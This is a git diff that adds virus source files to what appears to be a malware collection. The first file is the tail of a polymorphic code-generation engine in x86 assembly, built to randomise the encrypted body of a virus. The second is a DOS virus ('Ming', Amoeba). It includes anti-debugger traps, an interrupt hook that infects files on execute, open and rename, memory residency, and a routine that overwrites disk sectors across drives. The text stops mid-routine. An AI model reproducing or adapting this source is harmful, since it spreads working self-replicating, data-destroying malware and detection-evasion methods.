CreateCodeBeginTrash + + GC_Trash_Not1: + dec al + jz GC_Trash_Not2 + call GenerateNibble2 + jmp CreateCodeBeginTrash + + GC_Trash_Not2: + dec al + jz GC_Trash_Not3 + call GenerateNibble3 + jmp CreateCodeBeginTrash + + GC_Trash_Not3: + dec al + jz GC_Trash_Not4 + call GenerateNibble4 + jmp CreateCodeBeginTrash + + GC_Trash_Not4: + dec al + jz CreateCodeBeginTrash + call GenerateNibble5 + + jmp CreateCodeBeginTrash + DoNibbleFindAlgo_NoTrashBegin: + + + DoNibbleNewRnd: + call GetRandomNumber + mov al, byte[RandomNumber] + and al, 0000'0111b + cmp al, 4 + ja DoNibbleNewRnd + + test al, -1 + + jnz DoNibbleFindAlgoNot5 + ; -> 5 + mov byte[FlagMask], MaskNibble5 + mov bl, byte[NibbleData] + call GenerateNibble5 + jmp DoNibbleFinalize + + + + DoNibbleFindAlgoNot5: + + dec al + jnz DoNibbleFindAlgoNot04 + ; -> 0+4 + + mov byte[FlagMask], MaskNibble0 + mov bl, byte[NibbleData] + call GenerateNibble0 + + mov byte[FlagMask], MaskNibble4 + mov bl, byte[NibbleData] + call 
GenerateNibble4 + jmp DoNibbleFinalize + + + + DoNibbleFindAlgoNot04: + + dec al + jnz DoNibbleFindAlgoNot14 + ; -> 1+4 + mov byte[FlagMask], MaskNibble5 ; need to clear AF first, + mov bl, byte[RandomNumber+3] ; otherwise AAA/AAS influence CF + and bl, 0000'1011b ; clear AF + call GenerateNibble5 + + mov byte[FlagMask], MaskNibble1 + mov bl, byte[NibbleData] + call GenerateNibble1 + + mov byte[FlagMask], MaskNibble4 + mov bl, byte[NibbleData] + call GenerateNibble4 + jmp DoNibbleFinalize + + + + DoNibbleFindAlgoNot14: + + dec al + jnz DoNibbleFindAlgoNot24 + ; -> 2+4 + mov byte[FlagMask], MaskNibble2 + mov bl, byte[NibbleData] + call GenerateNibble2 + + mov byte[FlagMask], MaskNibble4 + mov bl, byte[NibbleData] + call GenerateNibble4 + jmp DoNibbleFinalize + + + + DoNibbleFindAlgoNot24: + ; -> 4+0 + + mov byte[FlagMask], MaskNibble4 + mov bl, byte[NibbleData] + call GenerateNibble4 + + mov byte[FlagMask], MaskNibble0 + mov bl, byte[NibbleData] + call GenerateNibble0 +; jmp DoNibbleFinalize + + + DoNibbleFinalize: + + call GetRandomNumber + test byte[RandomNumber], 0001'0000b ; LAHF or PUSHFD+POP? 
+ jnz DoNF_PUSHFD + + mov byte[edi], 0x9F ; LAHF + inc edi + + test byte[RandomNumber], 0000'1000b + jnz DoNibbleFin_AH + + test byte[RandomNumber], 0000'0010b + jnz DoNibbleFinAL_2 + + mov byte[edi+00], 0x88 + mov byte[edi+01], 0xE0 ; mov al, ah + jmp DoNibbleFinAL_2_X + + DoNibbleFinAL_2: + mov byte[edi+00], 0x86 + mov byte[edi+01], 0xC4 ; xchg ah, al + test byte[RandomNumber], 0000'0100b + jnz DoNibbleFinAL_2_X + + mov byte[edi+01], 0xE0 ; xchg al, ah + DoNibbleFinAL_2_X: + + mov byte[edi+02], 0xAA ; stos + add edi, 3 + jmp DoNibbleEnd + + + + DoNibbleFin_AH: + mov byte[edi+00], 0x88 + mov byte[edi+01], 0x27 ; mov byte[edi], ah + mov byte[edi+02], 0x47 ; inc edi (thx hh86 :D) + add edi, 3 + jmp DoNibbleEnd + + + DoNF_PUSHFD: + mov byte[edi], 0x9C ; pushfd + inc edi + + test byte[RandomNumber], 0100'0000b + jnz DoNF_PUSHFD_AL + + + mov al, byte[RandomNumber] + and al, 0000'0011b + add al, 0x58 + mov byte[edi+00], al ; pop e(a|c|d|b)x + + mov byte[edi+01], 0x88 + and al, 0000'0011b + shl al, 3 + or al, 0000'0111b + mov byte[edi+02], al ; mov byte[edi], (a|c|d|b)l + mov byte[edi+03], 0x47 ; inc edi (thx hh86 :D) + add edi, 4 + jmp DoNibbleEnd + + DoNF_PUSHFD_AL: + mov byte[edi+00], 0x58 ; pop eax + mov byte[edi+01], 0xAA ; stos + add edi, 2 +; jmp DoNibbleEnd + + DoNibbleEnd: + + mov dword[VerifiedAddress], edi + +ret + +; ########################################################################### +; ##### +; ##### Generate Nibbles +; ##### + + + + +; ########################################################################### +; ##### Nibble 0: CF - (ROL, ROR) + +GenerateNibble0: +; edi ... pointer in filecode +; bl & 0000'1111b ... nibble to generate + + +; ebp: +; 0 ... rol Reg, 1 +; 1 ... rol Reg, cl + +; 3 ... 
ror Reg, cl + + + + call InformationToFlagByte ; bh=flag byte + + GN0_GetTypeAgain: + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0011b + + cmp ebp, 2 + je GN0_GetTypeAgain + + push 0 ; loop counter + + GN0_CF_loop: ; rol Reg, 1 + + pop ecx + inc ecx + push ecx + cmp ecx, 0x2A + ja GN_PossibleInfinitLoop + + GN0_CF_GetAnotherCL: + call GetRandomNumber + mov ecx, dword[RandomNumber] + + test ecx, 0001'1111b ; shiftcount must not be zero + jz GN0_CF_GetAnotherCL + + + call GetRandomNumber + mov eax, dword[RandomNumber] + push eax + + cmp ebp, 0 + jne GN0_CF_loop_ROLN + + rol eax, 1 + jmp GN0_CF_loop_LAHF + + GN0_CF_loop_ROLN: ; rol Reg, N/cl + cmp ebp, 1 + jne GN0_CF_loop_RORN + + rol eax, cl + jmp GN0_CF_loop_LAHF + + GN0_CF_loop_RORN: ; ror Reg, N/cl + ror eax, cl +; jmp GN0_CF_loop_LAHF + + + GN0_CF_loop_LAHF: + lahf + + pop edx + + and ah, byte[FlagMask] + and bh, byte[FlagMask] + + cmp ah, bh + jne GN0_CF_loop + + pop eax ; remove counter + + GN0_GetDifferentRegister: + call GetRandomNumber + mov eax, dword[RandomNumber] + and al, 0000'0011b + cmp al, 0000'0001b + je GN0_GetDifferentRegister ; dont use ECX because we can use CL as second parameter (~2h to find this :) ) + + or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, ecx, edx) + mov byte[edi], al + inc edi + + mov dword[edi], edx + add edi, 4 + + push ebp + and ebp, 0000'0001b + pop ebp + jnz GN0_CFN ; is it "rotate Reg, 1" ? 
+ + mov byte[edi], 0xD1 + inc edi + + and al, 0000'0011b + cmp ebp, 0 + jne GN0_CF_CreateCode_ROR + add al, 0xC0 + jmp GN0_CF_CreateCode_done + + GN0_CF_CreateCode_ROR: + add al, 0xC8 + + GN0_CF_CreateCode_done: + mov byte[edi], al + inc edi + jmp GN0_CF_End + + + + GN0_CFN: + + mov byte[edi], 0xB9 + inc edi + + mov dword[edi], ecx + add edi, 4 + + mov byte[edi], 0xD3 + inc edi + + and al, 0000'0011b + + and ebp, 0000'0010b + jnz GN0_CFN_ROR + + add al, 0xC0 + jmp GN0_CF_Write_End + + GN0_CFN_ROR: + add al, 0xC8 + + GN0_CF_Write_End: + mov byte[edi], al + inc edi + + + + GN0_CF_End: + mov dword[VerifiedAddress], edi + +ret + + +; ##### Nibble 0: CF - (ROL, ROR) +; ########################################################################### + + + + +; ########################################################################### +; ##### Nibble 1: AF, CF (PF, SF undefined) - (AAA, AAS) + +GenerateNibble1: +; edi ... pointer in filecode +; bl & 0000'1111b ... nibble to generate + + + + call InformationToFlagByte ; bh=flag byte + + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0001b + + push 0 ; loop counter + + GN1_Loop: + + pop eax + inc eax + push eax + cmp eax, 0x2A + ja GN_PossibleInfinitLoop + + call GetRandomNumber + mov eax, dword[RandomNumber] + push eax + + cmp ebp, 0 ; this instruction clears AF. Thats important because + jne GN1_Aaa ; AAA and AAS depend on AF, and influence CF depending on it. 
+ + aas + jmp GN1_LAHF + + GN1_Aaa: + aaa + jmp GN1_LAHF + + GN1_LAHF: + pop edx + + lahf + + and ah, byte[FlagMask] + and bh, byte[FlagMask] + cmp ah, bh + jne GN1_Loop + + pop eax ; remove counter + + mov byte[edi], 0xB8 + inc edi + + mov dword[edi], edx ; mov Reg1, NUMBER + add edi, 4 + + + cmp ebp, 0 + jne GN1_WriteAaa + + mov byte[edi], 0x3F + inc edi + jmp GN1_Fin + + GN1_WriteAaa: + mov byte[edi], 0x37 + inc edi + + GN1_Fin: + mov dword[VerifiedAddress], edi + + +ret + + +; ##### Nibble 1: AF, CF (PF, SF undefined) - (AAA, AAS) +; ########################################################################### + + + + +; ########################################################################### +; ##### Nibble 2: CF PF (AF undefined, SF undefined?) - (SHL, SHR, SAL, SAR) + +GenerateNibble2: +; edi ... pointer in filecode +; bl & 0000'1111b ... nibble to generate + + +; ebp: +; 0 ... shl Reg, 1 +; 1 ... shl Reg, N/cl +; 4 ... sal Reg, 1 +; 5 ... sal Reg, N/cl +; 7 ... sar Reg, N/cl + + + call InformationToFlagByte ; bh=flag byte + + GN2_GetTypeAgain: + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0111b + + cmp ebp, 2 + je GN2_GetTypeAgain + cmp ebp, 3 + je GN2_GetTypeAgain + cmp ebp, 6 + je GN2_GetTypeAgain + + push 0 ; counter + + GN2_Shift_loop: ; shl Reg, 1 + + pop ecx + inc ecx + push ecx + cmp ecx, 0x2A + ja GN_PossibleInfinitLoop + + call GetRandomNumber + mov ecx, dword[RandomNumber] + + GN2_CF_GetAnotherCL: + call GetRandomNumber + mov ecx, dword[RandomNumber] + + test ecx, 0001'1111b ; shiftcount must not be zero + jz GN2_CF_GetAnotherCL + + call GetRandomNumber + mov eax, dword[RandomNumber] + push eax + + cmp ebp, 0 + jne GN2_Shift_loop_SHLN + + shl eax, 1 + jmp GN2_Shift_loop_LAHF + + GN2_Shift_loop_SHLN: ; shl Reg, N/cl + cmp ebp, 1 + jne GN2_Shift_loop_SAL1 + + shl eax, cl + jmp GN2_Shift_loop_LAHF + + GN2_Shift_loop_SAL1: ; sal Reg, 1 + cmp ebp, 4 + jne GN2_Shift_loop_SALN + + sal eax, 1 + jmp GN2_Shift_loop_LAHF + + + 
GN2_Shift_loop_SALN: ; sal Reg, N + cmp ebp, 5 + jne GN2_Shift_loop_SARN + + sal eax, cl + jmp GN2_Shift_loop_LAHF + + + GN2_Shift_loop_SARN: ; sar Reg, N + sar eax, cl +; jmp GN3_Shift_loop_LAHF + + + GN2_Shift_loop_LAHF: + lahf + + pop edx + + and ah, byte[FlagMask] + and bh, byte[FlagMask] + + cmp ah, bh + jne GN2_Shift_loop + + pop eax ; remove counter + + GN2_GetDifferentRegister: + call GetRandomNumber + mov eax, dword[RandomNumber] + and al, 0000'0011b + cmp al, 0000'0001b + je GN2_GetDifferentRegister ; dont use ECX because we can use CL as second parameter (~2h to find this :) ) + + or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, edx) + mov byte[edi], al + inc edi + + mov dword[edi], edx + add edi, 4 + + push ebp + and ebp, 0000'0001b + pop ebp + jnz GN2_ShiftN ; is it "shift Reg, 1" ? + + mov byte[edi], 0xD1 + inc edi + + and al, 0000'0011b + cmp ebp, 0 + jne GN2_Shift_CreateCode_SAL + add al, 0xE0 + jmp GN2_Shift_CreateCode_done + + GN2_Shift_CreateCode_SAL: + cmp ebp, 4 + jne GN2_Shift_CreateCode_SAR + add al, 0xF0 + jmp GN2_Shift_CreateCode_done + + GN2_Shift_CreateCode_SAR: + add al, 0xF0 + + GN2_Shift_CreateCode_done: + mov byte[edi], al + inc edi + jmp GN2_Shift_End + + GN2_ShiftN: + + and al, 0000'0011b + + cmp ebp, 1 + jne GN2_ShiftNum_NotShl + + add al, 0xE0 ; shl + jmp GN2_ShiftNum_WriteNow + + GN2_ShiftNum_NotShl: + cmp ebp, 5 + jne GN2_ShiftNum_NotSal + + add al, 0xF0 ; sal + jmp GN2_ShiftNum_WriteNow + + GN2_ShiftNum_NotSal: + add al, 0xF8 ; sar +; jmp GN2_ShiftNum_WriteNow + + GN2_ShiftNum_WriteNow: + + call GetRandomNumber + mov ah, byte[RandomNumber] ; 0 ... shift Reg, NNNN + ; 1 ... shift Reg, cl + and ah, 0000'0001b + + jz GN2_Shift_Num + + mov byte[edi], 0xB9 ; mov ecx, ... 
+ inc edi + + mov dword[edi], ecx + add edi, 4 + + mov byte[edi], 0xD3 + inc edi + + mov byte[edi], al + inc edi + jmp GN2_Shift_End + + GN2_Shift_Num: + mov byte[edi], 0xC1 + inc edi + + mov byte[edi], al + inc edi + + mov byte[edi], cl + inc edi + + + GN2_Shift_End: + + mov dword[VerifiedAddress], edi +ret + + +; ##### Nibble 2: CF PF (AF undefined, SF undefined?) - (SHL, SHR, SAL, SAR) +; ########################################################################### + + +; ########################################################################### +; ##### Nibble 3: PF SF (AF undefined) - (AND, XOR, TEST) + +GenerateNibble3: +; edi ... pointer in filecode +; bl & 0000'1111b ... nibble to generate + + + + call InformationToFlagByte ; bh=flag byte + + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0011b + + push 0 + + GN3_AndXorTest_Loop: + + pop eax + inc eax + push eax + cmp eax, 0x2A + ja GN_PossibleInfinitLoop + + call GetRandomNumber + mov eax, dword[RandomNumber] + push eax + + call GetRandomNumber + mov ecx, dword[RandomNumber] + + cmp ebp, 0 + jne GN3_AndXorTest_NotAnd + and eax, ecx + jmp GN3_AndXorTest_LAHF + + GN3_AndXorTest_NotAnd: + cmp ebp, 1 + jne GN3_AndXorTest_NotXor + xor eax, ecx + jmp GN3_AndXorTest_LAHF + + GN3_AndXorTest_NotXor: + test eax, ecx + jmp GN3_AndXorTest_LAHF + + GN3_AndXorTest_LAHF: + pop edx + + lahf + + and ah, byte[FlagMask] + and bh, byte[FlagMask] + cmp ah, bh + jne GN3_AndXorTest_Loop + + pop eax ; remove counter + + call GetRandomNumber + mov eax, dword[RandomNumber] + and eax, 0000'0011b + or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, ecx, edx) + mov byte[edi], al + and eax, 0000'0011b + inc edi + + mov dword[edi], edx ; mov Reg1, NUMBER + add edi, 4 + + and eax, 0000'0011b + + call GetRandomNumber + mov esi, dword[RandomNumber] + and esi, 0000'0001b + + je GN3_AndXorTest_Num + ; and Reg1, Reg2 + GN3_AndXorTest_TwoRegisters_Next: + call GetRandomNumber + mov ebx, dword[RandomNumber] + and ebx, 0011b 
+ cmp ebx, eax + je GN3_AndXorTest_TwoRegisters_Next ; Not the same registers! + + or bl, 0xB8 + mov byte[edi], bl ; mov Reg2, ... + inc edi + mov dword[edi], ecx ; mov Reg2, NNNN + add edi, 4 + + cmp ebp, 0 + jne GN3_AndXorTest_2Regs_NoAnd + mov byte[edi], 0x21 + jmp GN3_AndXorTest_2Regs_cont1 + + GN3_AndXorTest_2Regs_NoAnd: + cmp ebp, 1 + jne GN3_AndXorTest_2Regs_NoXor + + mov byte[edi], 0x31 + jmp GN3_AndXorTest_2Regs_cont1 + + GN3_AndXorTest_2Regs_NoXor: + mov byte[edi], 0x85 + jmp GN3_AndXorTest_2Regs_cont1 + + GN3_AndXorTest_2Regs_cont1: + inc edi + + and bl, 0011b ; Reg2 + shl bl, 3 ; bl=000??000 + add bl, al ; bl=000??0?? + add bl, 1100'0000b ; bl=110??0?? + mov byte[edi], bl + inc edi + jmp GN3_AndXorTest_Fin + + GN3_AndXorTest_Num: + push ebp + and ebp, 0000'0010b + pop ebp + jz GN3_AndXorTest_Num_AndXor + + mov byte[edi], 0xF7 + inc edi + + or al, 0xC0 + mov byte[edi], al + inc edi + + mov dword[edi], ecx + add edi, 4 + jmp GN3_AndXorTest_Fin + + + GN3_AndXorTest_Num_AndXor: + mov byte[edi], 0x81 + inc edi + + cmp ebp, 0 + jne GN3_AndXorTest_Num_NoAnd + or al, 0xE0 + jmp GN3_AndXorTest_Num_cont1 + + GN3_AndXorTest_Num_NoAnd: + or al, 0xF0 +; jmp GN3_AndXorTest_Num_cont1 + + GN3_AndXorTest_Num_cont1: + mov byte[edi], al + inc edi + + mov dword[edi], ecx + add edi, 4 + + GN3_AndXorTest_Fin: + + mov dword[VerifiedAddress], edi +ret + + +; ##### Nibble 3: CF PF SF (AF undefined) - (AND, XOR, TEST) +; ########################################################################### + + + +; ########################################################################### +; ##### Nibble 4: AF PF SF (DEC, INC) + +GenerateNibble4: +; edi ... pointer in filecode +; bl & 0000'1111b ... 
nibble to generate + + + call InformationToFlagByte ; bh=flag byte + + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0001b + + + push 0 + + GN4_IncDec_Loop: + + pop eax + inc eax + push eax + cmp eax, 0x2A + ja GN_PossibleInfinitLoop + + call GetRandomNumber + mov eax, dword[RandomNumber] + push eax + + cmp ebp, 0 + je GN4_IncDec_Loop_DEC + + inc eax + lahf + jmp GN4_IncDec_Loop_fin + + GN4_IncDec_Loop_DEC: + dec eax + lahf + + GN4_IncDec_Loop_fin: + pop edx + + and ah, byte[FlagMask] + and bh, byte[FlagMask] + cmp ah, bh + jne GN4_IncDec_Loop + + pop eax ; remove counter + + call GetRandomNumber + mov eax, dword[RandomNumber] + and al, 0000'0011b + or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, ecx, edx) + mov byte[edi], al + inc edi + + mov dword[edi], edx + add edi, 4 + + + and al, 0000'0011b + + cmp ebp, 1 + je GN4_IncDec_Loop_writeByteINC + + add al, 8 + + GN4_IncDec_Loop_writeByteINC: + add al, 0x40 + + mov byte[edi], al + inc edi + + mov dword[VerifiedAddress], edi +ret + + +; ##### Nibble 4: AF PF SF (DEC, INC) +; ########################################################################### + + +; ########################################################################### +; ##### Nibble 5: AF CF PF SF (ADD, CMD, NEG, SUB) + + +GenerateNibble5: +; edi ... pointer in filecode +; bl & 0000'1111b ... 
nibble to generate + +; AF CF PF SF +; using ADD, SUB, CMP, NEG + + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0011b + + cmp ebp, 0x0 + je GN5_Neg + + + + GN8AddSubCmpNext: + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0011b ; ebp tells which instruction to use (1=add, 2=sub, 3=cmp) + jz GN8AddSubCmpNext + jmp GN5_AddSubCmp + + GN5_fin: + + mov dword[VerifiedAddress], edi +ret + + + +GN5_Neg: + call InformationToFlagByte ; bh=flag byte + + push 0 + + GN5_Neg_Loop: + + pop eax + inc eax + push eax + cmp eax, 0x2A + ja GN_PossibleInfinitLoop + + call GetRandomNumber + mov eax, dword[RandomNumber] + push eax + + neg eax + lahf + + pop edx + + cmp ah, bh + jne GN5_Neg_Loop + + pop eax + + call GetRandomNumber + mov eax, dword[RandomNumber] + and al, 0000'0011b + or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, ecx, edx) + mov byte[edi], al + inc edi + + mov dword[edi], edx + add edi, 4 + + mov byte[edi], 0xF7 + inc edi + + and al, 0000'0011b + add al, 0xD8 + mov byte[edi], al + inc edi + +jmp GN5_fin + + + + +GN5_AddSubCmp: + call InformationToFlagByte ; bh=flag byte + call GetRandomNumber + + push 0 ; loop counter + + GN5_AddSubCmp_Loop: + + pop edx + inc edx + push edx + cmp edx, 0x2A + ja GN_PossibleInfinitLoop + + mov edx, dword[RandomNumber] + push edx + call GetRandomNumber + mov esi, dword[RandomNumber] + + cmp ebp, 1 + je GN5_AddSubCmp_Loop_Sub + + cmp ebp, 2 + je GN5_AddSubCmp_Loop_Cmp + + mov ecx, 0x01C0 + add edx, esi + jmp GN5_AddSubCmp_Loop_LAHF + + GN5_AddSubCmp_Loop_Sub: + mov ecx, 0x29E8 + sub edx, esi + jmp GN5_AddSubCmp_Loop_LAHF + + GN5_AddSubCmp_Loop_Cmp: + mov ecx, 0x39F8 + cmp edx, esi + + + GN5_AddSubCmp_Loop_LAHF: + lahf + + pop edx + + and ah, byte[FlagMask] + and bh, byte[FlagMask] + cmp ah, bh + jne GN5_AddSubCmp_Loop + + pop eax ; remove counter + + call GetRandomNumber + mov eax, dword[RandomNumber] + and eax, 0000'0011b ; create Register number + push eax ; save Register number + + mov 
bl, al + add bl, 0xB8 + + mov byte[edi], bl + inc edi + + mov dword[edi], edx + add edi, 4 ; mov Reg1, NNNN + + call GetRandomNumber + mov eax, dword[RandomNumber] + and eax, 1 + + jz GN5_AddSubCmp_TwoRegisters + + + mov byte[edi], 0x81 + inc edi + + mov dl, cl + pop eax ; get Register number + add dl, al ; use Register number + mov byte[edi], dl ; add Reg, ... + inc edi + mov dword[edi], esi + add edi, 4 + jmp GN5_fin + + GN5_AddSubCmp_TwoRegisters: + + pop eax ; Register number + and al, 0000'0011b + + GN5_AddSubCmp_TwoRegisters_Next: + call GetRandomNumber + mov ebx, dword[RandomNumber] + and ebx, 0011b + cmp ebx, eax + je GN5_AddSubCmp_TwoRegisters_Next ; Not the same registers! + + or bl, 0xB8 + mov byte[edi], bl ; mov Reg2, ... + inc edi + mov dword[edi], esi ; mov Reg2, NNNN + add edi, 4 + + and bl, 0011b ; Reg2 + shl bl, 3 ; bl=000??000 + add bl, al ; bl=000??0?? + or bl, 1100'0000b ; bl=110??0?? + mov byte[edi], ch + inc edi + mov byte[edi], bl + inc edi ; add Reg1, Reg2 + +jmp GN5_fin + +; ##### Nibble 5: AF CF PF SF (ADD, CMD, NEG, SUB) +; ########################################################################### + +InformationToFlagByte: +; in: bl=0000'SAPC +; out: bh=S00A'0P1C + + push eax + mov al, bl + ; CF: + mov bh, bl ; ah=0000'SAPC + and bh, 0000'0001b ; ah=0000'000C + + ; PF: + shl bl, 1 ; al=000S'APC0 + or bh, bl ; ah=000S'APCC + and bh, 0000'0101b ; ah=0000'0P0C + + ; AF: + shl bl, 1 ; al=00SA'PC00 + and bl, 0011'0000b ; al=00SA'0000 + or bh, bl ; ah=00SA'0P0C + and bh, 0001'0101b ; ah=000A'0P0C + + ; SF: + shl bl, 2 ; al=SA00'0000 + or bh, bl ; ah=SA0A'0P0C + and bh, 1001'0101b ; ah=S00A'0P0C + or bh, 0000'0010b ; ah=S00A'0P1C + + xchg al, bl + pop eax +ret + + +GN_PossibleInfinitLoop: +; given Nibble could not be created with current methode +; therefore give up after 42+ trials and try with another one + + + pop eax ; remove counter + pop eax ; remove return-addresse + + mov edi, dword[VerifiedAddress] ; last correct addresse of file + + ; 
if there has already been some code written to the + ; new file, it can be considered as random functional trash :) + +jmp CreateCodeForNibble + + + +; ##### +; ##### Generate Nibbles +; ##### +; ########################################################################### + + +GetRandomNumber: + pushad + xor edx, edx + mov eax, dword[RandomNumber] + ror eax, 16 + + mov ebx, 1103515245 + mul ebx ; EDX:EAX = EDX:EAX * EBX + + add eax, 12345 + rol eax, 16 + mov dword[RandomNumber], eax + popad +ret + +CreateSpecialRndNumber: +; in: ebx, ecx +; out: edx=(rand()%ebx + ecx) + + call GetRandomNumber + + xor edx, edx + mov eax, dword[RandomNumber] + div ebx + + add edx, ecx +ret + +WholeCodeEnd: + +times (175'269 + 7 * 1149 - (WholeCodeEnd-StartEngine)) db 0x0 ; 1st generation padding + ; This is average size of encrypted virus + 7 * sigma - 1st gen. code + ; 7*sigma ~ 99.999999999744 % of all cases + ; (i took the average of 15files, as statistics is very high in one + ; file, this is to a very good approx. gauss distributed) +.end start \ No newline at end of file diff --git a/Win32/Virus.Win32.Ming.asm b/Win32/Virus.Win32.Ming.asm new file mode 100644 index 00000000..dc8687fb --- /dev/null +++ b/Win32/Virus.Win32.Ming.asm 
@@ -0,0 +1,1028 @@ +;---------------------------------------------------------------------------; +; Title: Ming.CLME.1952 ; +; (c) 1996 Malware Technology ; +; Disclaimer: Malware Technology is not responsible for any problems ; +; caused due to assembly of this source. ; +;---------------------------------------------------------------------------; +.radix 10h +.model small +.code +.386 + +assume cs:_TEXT,ds:_TEXT,ss:_TEXT + +start: + call flex2 +flex2: + pop si +; sub si, offset flex2 - offset start + db 81,0EE + dw offset flex2 - offset start + + xor ax,ax + mov ds,ax ; DS := 0 + + ; Debugger Trap I + mov ax,cs + shl eax,10 ; Put segment into upper 16bit of eax + lea ax,newint01[si] + xchg eax,dword ptr ds:[4] ; int 01 vector + mov dword ptr ds:[4],eax + + ; Debugger Trap II + ; make a checksum over the virus + mov al,0 + mov bx,si + mov cx,19bh +checksum_loop: + add al,byte ptr cs:[bx] + inc bx + loop checksum_loop + cmp al,byte ptr cs:checksum[si] + jne newint01 + + cli + dec sp + sti + + push es + mov ah,0f2 + int 21 ; self-check + cmp ah,2 ; i am resident ? + jnz not_resident ; no + + call flex3 +flex3: + pop ax + sub ax,offset flex3 - offset start + xchg bp,ax + push cs + pop ds ; DS := CS + push cs + pop es ; ES := CS + lea si,initial_regs[bp] + lea di,old_ip[bp] + cld + mov cx,8 + rep movsb + pop es ; PSP segment + push es + mov ax,es + add ax,10 + add cs:old_cs[bp],ax + add cs:old_ss[bp],ax + mov ah,2ch + int 21 ; Get Time + cmp dh,2 ; Seconds = 2 ? 
+ jnz no_damage ; No + + ; Damage function + push bp + mov ah,3 + mov bh,0 + int 10 ; Get Cursor Position at Page 0 + push cx ; and save it + push dx + mov ax,1301 ; Give out string + mov dx,0800 ; (8,0) + push cs + pop es ; ES := CS + lea bp,copyright[bp] ; adress of string + mov bl,0f0 ; Attributes + mov cx,offset end_copyright - offset copyright + ; Length of String + int 10 ; now + mov ah,2 ; set cursor position + pop dx ; get from stack + pop cx + int 10 + pop bp + mov cx,0b6 + sti +stop_loop: + hlt + loop stop_loop + +no_damage: + pop es ; PSP segment + push es + pop ds + cli + mov ss,word ptr cs:old_ss[bp] + mov sp,word ptr cs:old_sp[bp] + sti + jmp start_host + +not_resident: + call flex4 +flex4: + pop si + sub si,offset flex4 - offset start + pop ax ; PSP-segment + add ax,10 + mov es,ax ; Segment after PSP + push es + xor ax,ax + xchg di,ax + mov ds,ax ; DS := 0 + + ; Debugger Trap III + mov eax,0CBA4F3FC ; CLD; REPZ; MOVSB; RETF + xchg eax,dword ptr ds:[000C] + mov cs:oldint03[si],eax + mov ax,offset start_over + push ax + mov cx,offset virus_end - offset start ; size of whole virus + push cs + pop ds + ; DS:SI - begin of virus + ; ES:DI - right after PSP + ; return adress on stack ES:00E5 + db 0EA + dd 0000000Ch ; JMP FAR 0000:000C + + +start_over: + xor ax,ax + mov ds,ax ; DS := 0 + mov ax,cs + shl eax,10 + mov ax,offset newint21 + xchg eax,dword ptr ds:[84] ; Set new int 21 + mov cs:oldint21,eax ; and save old one + mov eax,oldint03 + mov dword ptr ds:[200],eax ; Set int 80 to int 03 + + ; Get name of started program + push cs + pop ax + sub ax,10 ; => PSP segment + mov ds,ax + mov es,ax + mov ax,word ptr ds:[2c] ; segment of enviroment + mov ds,ax + mov bx,0ffff +env_loop: + inc bx + cmp word ptr ds:[bx],0 + jnz env_loop + cmp word ptr ds:[bx+2],1 + jnz env_loop + add bx,4 + + mov dx,bx + mov bx,offset exec_param_buffer + mov word ptr cs:[bx+4],es ; segment of command string + mov word ptr cs:[bx+8],es ; segment of 1st FCB + mov word ptr cs:[bx+0c],es 
; segment of 2nd FCB + + push ds + push es + xor ax,ax + mov es,ax ; ES := 0 + lds bx,dword ptr es:[0C1] ; ??? + cmp word ptr ds:[bx],9090 + jnz @@103 + mov bx,[bx+8] + lds bx,dword ptr ds:[bx] +@@103: + mov cx,25 + add bx,cx +@@105: + inc bx + cmp word ptr [bx],0FC80 + jnz @@104 + mov ax,bx +@@104: + loop @@105 + + mov di,offset tunneled_int21 + push cs + pop es + cld + stosw + mov ax,ds + stosw + + pop ax + push ax + dec ax + mov ds,ax + mov dword ptr ds:[8],656F6D41 + mov dword ptr ds:[0C],315F6162 + + pop es + pop ds + + mov ah,4ah + mov bx,1000 ; virus needs 64 kbyte ! + int 21 + + mov ax,4b00 + push cs + pop es + mov bx,offset exec_param_buffer + int 21 + mov ah,4dh + int 21 ; get ERRORLEVEL + mov ah,31 + mov dx,0200 + call call_int21 + + ; Exec-Param-Block +exec_param_buffer dw ? ; segment of enviroment + dw 0080 ; offset of command string + dw ? ; segment of command string + dw 005C ; offset of 1st FCB + dw ? ; segment of 1st FCB + dw 006C ; offset of 2nd FCB + dw ? ; segment of 2nd FCB + +copyright db ' *Amoeba v1.00* ',0ah,0dh + db 'Written by Crazy Lord (Ming)',0ah,0dh + db ' Made in Hong Kong ' +end_copyright equ $ + + +newint01: + call tunnel_int13 + xor ax,ax + mov ds,ax ; DS := 0 + mov ah,19 + int 21 ; get actual drive + xchg al,dl ; drive number into dl + mov dh,0 ; Head 0 + mov cx,1 ; Track 0 Sector 1 +trash_next_track: + mov ax,301 ; Write one sector + pushf + call dword ptr ds:[004ch] ; call int 13h + inc ch ; next Track + cmp ch,22 + jnz trash_next_track + inc dl ; next drive + jmp trash_next_track + + +newint21: + pushf + cmp ah,0f2 + jnz not_selfcheck + mov ah,2 + popf + iret +not_selfcheck: + cmp ax,4b00 + jz infect_file + cmp ah,3dh + jz infect_file + cmp ah,56 + jz infect_file + cmp ah,43 + jz infect_file + +go_old21: + popf + db 0EA ; JMP FAR xxxx:xxxx +oldint21 dd ? ; (0246) + +infect_file: + pusha + mov bx,dx + dec bx +next_char: + inc bx + cmp byte ptr ds:[bx],0 ; end of string ? 
